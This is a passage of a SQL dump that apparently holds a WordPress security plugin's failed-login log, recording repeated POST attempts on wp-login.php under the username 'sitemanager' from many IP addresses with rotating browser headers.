00:00:00'),(94486,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35880\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745992193.7995329;s:12:\"REQUEST_TIME\";i:1745992193;}}','66.102.128.27',0,'2025-04-30 11:19:55','1970-01-01 00:00:00'),(94487,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50896\";s:11:\"REMOTE_ADDR\";s:11:\"34.93.16.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745992840.2952721;s:12:\"REQUEST_TIME\";i:1745992840;}}','34.93.16.66',0,'2025-04-30 11:30:42','1970-01-01 00:00:00'),(94488,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33286\";s:11:\"REMOTE_ADDR\";s:12:\"14.225.8.196\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745993165.8289189;s:12:\"REQUEST_TIME\";i:1745993165;}}','14.225.8.196',0,'2025-04-30 11:36:07','1970-01-01 00:00:00'),(94489,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52370\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745993489.3437009;s:12:\"REQUEST_TIME\";i:1745993489;}}','198.27.67.210',0,'2025-04-30 11:41:31','1970-01-01 00:00:00'),(94490,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47024\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745993812.4990859;s:12:\"REQUEST_TIME\";i:1745993812;}}','198.54.114.85',0,'2025-04-30 11:46:54','1970-01-01 00:00:00'),(94491,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51912\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745994141.3973651;s:12:\"REQUEST_TIME\";i:1745994141;}}','31.172.67.59',0,'2025-04-30 11:52:23','1970-01-01 00:00:00'),(94492,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34010\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745994468.651406;s:12:\"REQUEST_TIME\";i:1745994468;}}','162.213.251.71',0,'2025-04-30 11:57:50','1970-01-01 00:00:00'),(94493,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49574\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745994801.186043;s:12:\"REQUEST_TIME\";i:1745994801;}}','192.64.117.43',0,'2025-04-30 12:03:23','1970-01-01 00:00:00'),(94494,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42498\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745995127.0011411;s:12:\"REQUEST_TIME\";i:1745995127;}}','66.102.128.27',0,'2025-04-30 12:08:48','1970-01-01 00:00:00'),(94495,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47300\";s:11:\"REMOTE_ADDR\";s:13:\"92.204.132.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745995459.06549;s:12:\"REQUEST_TIME\";i:1745995459;}}','92.204.132.36',0,'2025-04-30 12:14:20','1970-01-01 00:00:00'),(94496,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40148\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded